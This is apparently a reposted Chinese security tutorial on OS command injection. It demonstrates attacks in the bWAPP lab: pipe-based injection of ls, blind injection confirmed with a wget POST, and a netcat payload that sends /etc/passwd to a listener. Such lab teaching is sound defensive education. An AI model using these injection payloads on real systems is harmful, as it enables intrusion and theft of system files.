前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >OS命令注入详解

OS命令注入详解

作者头像
企鹅号小编
发布2018-01-09 17:15:40
2.9K0
发布2018-01-09 17:15:40
举报
文章被收录于专栏:企鹅号快讯企鹅号快讯

关于OS命令执行漏洞我相信各位并不陌生,那今天我也就在这里分享一些OS命令注入的经验与技巧。

OS命令执行漏洞介绍:

原理:

应用程序有时需要调用一些执行系统命令的函数,如PHP中的SYSTEM,EXEC,SHELL_EXEC,POPEN,PROC_POPEN等,当用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。

那这里首先说一下最简单的利用方式

在BWAPP中的OS命令注入一关中,程序对用户输入的网址进行IP解析,这里我们输入百度的网址可以直接把服务器的IP地址给解析出来

这里我们利用管道符号来执行系统命令

我们可以看到这里我们就执行了ls命令列出了网站目录文件。这是最为简单地一种利用方式。那接下来就来说一下OS命令盲注。

与SQL注入类似的是,OS命令盲注同样也不会在页面上返回太多的结果,但命令是的确执行了,同样这里使用的是BWAPP测试程序。

这里要求我们输入一个IP地址

执行之后发现页面没有返回执行结果,再输入管道符号执行命令发现同样也没有返回执行结果。

通过Burpsuit进行抓包

发现没有返回什么数据。

然后这里想到了用wget进行测试

Payload如下:

192.168.0.104 wget --post-data=”name=baobao”http://192.168.0.104:81/getfile.php

执行之后查看本地的Apache服务器日志发现有请求,这代表着服务器确实执行了我们的命令

在本地用NC运行nc -l -p 12345

然后在程序输入框中输入:

192.168.0.104 nc -w 1 192.168.0.104 12345 < /etc/passwd

成功接收到了数据,漏洞利用成功。

本文来自企鹅号 - 白帽子社区媒体

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文来自企鹅号 - 白帽子社区媒体

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档